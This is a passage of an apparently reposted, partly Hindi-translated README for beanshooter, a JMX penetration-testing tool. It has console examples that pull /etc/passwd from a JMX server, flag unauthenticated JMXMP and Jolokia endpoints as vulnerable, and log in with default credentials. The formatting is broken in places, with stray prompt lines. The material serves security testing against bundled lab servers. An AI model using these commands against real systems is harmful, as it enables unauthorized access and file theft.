Tonka डाउनलोड

download कार्रवाई का उपयोग JMX सर्वर से एक फ़ाइल डाउनलोड करने के लिए किया जा सकता है:```console [qtc@devbox ~]$ beanshooter tonka download 172.17.0.2 9010 /etc/passwd [+] Saving remote file /etc/passwd to local path /home/qtc/passwd [+] 1172 bytes were written to /home/qtc/passwd

root@kitploit:~
### JMXMP

---

JMX सेवाएँ विभिन्न कनेक्टर प्रकारों का उपयोग कर सकती हैं। अब तक सबसे अधिक उपयोग किया जाने वाला कनेक्टर *Java RMI* है, जो *Java RMI* प्रोटोकॉल के आधार पर *JMX* तक पहुँच की अनुमति देता है। एक अन्य लोकप्रिय कनेक्टर *JMX Message Protocol* (*JMXMP*) है, जो पुराना होने के बावजूद, अक्सर सामने आता है। *beanshooter* में अंतर्निहित *JMXMP* समर्थन है और `--jmxmp` विकल्प का उपयोग करते समय *JMXMP* के माध्यम से कनेक्ट करने का प्रयास करता है:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 4444 --jmxmp
[+] Checking servers SASL configuration:
[+]
[+] 	- Remote JMXMP server does not use SASL.
[+] 	  Login is possible without specifying credentials.
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] 	- JMXMP serial check is work in progress but endpoints are usually vulnerable.
[+] 	  Configuration Status: Undecided
[+]
[+] Checking available MBeans:
[+]
[+] 	- 22 MBeans are currently registred on the MBean server.
[+] 	  Found 0 non default MBeans.

प्रमाणित JMXMP एंडपॉइंट्स आमतौर पर SASL का उपयोग करके सुरक्षित किए जाते हैं। SASL सक्षम होने पर, JMX एंडपॉइंट को आमतौर पर क्लाइंट को एक विशिष्ट SASL प्रोफ़ाइल से कनेक्ट करने की आवश्यकता होती है। beanshooter के लिए उपलब्ध प्रोफ़ाइलें हैं:

  • plain
  • digest
  • cram
  • ntlm
  • gssapi

जब SASL संरक्षित JMXMP एंडपॉइंट पर enum क्रिया का उपयोग करते हैं, तो beanshooter आवश्यक SASL प्रोफ़ाइल को सूचीबद्ध करने का प्रयास करता है। जबकि आवश्यक SASL तंत्र का निर्धारण आमतौर पर संभव है, आवश्यक TLS सेटिंग को सूचीबद्ध नहीं किया जा सकता है:```console [qtc@devbox ~]$ beanshooter enum 172.17.0.2 4449 --jmxmp [+] Checking servers SASL configuration: [+] [+] - Remote JMXMP server uses SASL/NTLM SASL profile. [+] Notice: TLS setting cannot be enumerated and --ssl may be required. [+] Vulnerability Status: Non Vulnerable [+] [+] Checking pre-auth deserialization behavior: [+] [+] - JMXMP serial check is work in progress but endpoints are usually vulnerable. [+] Configuration Status: Undecided

root@kitploit:~
### Jolokia समर्थन

---

*v4.0.0* से शुरू करते हुए, *beanshooter* [Jolokia](https://github.com/rhuss/jolokia) आधारित JMX एंडपॉइंट्स का समर्थन करता है।
*Jolokia* आधारित एंडपॉइंट से कनेक्शन स्थापित करने के लिए सामान्य लक्ष्य प्रारूप और `--jolokia` फ्लैग की आवश्यकता होती है:```console
[qtc@devbox ~]$ beanshooter enum 172.17.0.2 8080 --jolokia --username manager --password admin
[+] Checking specified credentials:
[+]
[+] 	- Login successful! The specified credentials are correct.
[+] 	  Username: manager  - Password: admin
[+]
[+] Checking Jolokia Version:
[+]
[+] 	- Agent Version 1.7.1 - Protocol Version: 7.2
[+] 	  Vulnerability Status: Non Vulnerable
[+]
[+] Checking whether Jolokia Proxy Mode is enabled:
[+]
[+] 	- Jolokia Proxy Mode is enabled! You may connect to backend JMX services.
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] 	- 75 MBeans are currently registred on the MBean server.
[+] 	  Listing 56 non default MBeans:
...

Due to the limited feature set of Jolokia, not all beanshooter operations are supported. Please consult the Jolokia FAQ if you have any questions. For playing around with Jolokia, beanshooter provides an example server that exposes an Jolokia endpoint on port 8080. Additionally, a regular RMI based JMX endpoint can be found on port 1090.

Docker Image


Since version v3.1.1, beanshooter is also available as docker image and can be pulled from the GitHub Container Registry. For each release, there is a normal and a slim version available. Both provide a full working version of beanshooter, but only the normal version ships with ysoserial included, resulting in a larger image size:

  • docker pull ghcr.io/qtc-de/beanshooter/beanshooter:4.1.0 - 124MB
  • docker pull ghcr.io/qtc-de/beanshooter/beanshooter:4.1.0-slim - 64.8MB

You can also build the container on your own by running the following commands:```console [user@host ~]$ git clone https://github.com/qtc-de/beanshooter [user@host ~]$ cd beanshooter && docker build -t beanshooter .

root@kitploit:~
### उदाहरण सर्वर

---

![](https://github.com/qtc-de/beanshooter/workflows/example%20server%20-%20master/badge.svg?branch=master)
![](https://github.com/qtc-de/beanshooter/workflows/example%20server%20-%20develop/badge.svg?branch=develop)

ऊपर प्रस्तुत अधिकांश उदाहरण [jmx-example-server](https://github.com/qtc-de/beanshooter/pkgs/container/beanshooter%2Fjmx-example-server)
और [tomcat-example-server](https://github.com/qtc-de/beanshooter/pkgs/container/beanshooter%2Ftomcat-example-server) पर आधारित हैं।
ये सर्वर इस रिपॉजिटरी के [docker](https://github.com/qtc-de/beanshooter/blob/HEAD/docker) फ़ोल्डर में शामिल हैं और इनका उपयोग *JMX* गणना का अभ्यास करने के लिए किया जा सकता है।
आप स्वयं संबंधित कंटेनर बना सकते हैं या उन्हें सीधे *GitHub Container Registry* से लोड कर सकते हैं।

कॉपीराइट 2023, Tobias Neitzel और *beanshooter* योगदानकर्ता।
टूल डाउनलोड करें
  • exec
  • execarray
  • shell
  • upload
  • download
  • JMXMP
  • Jolokia समर्थन
  • Docker छवि
  • उदाहरण सर्वर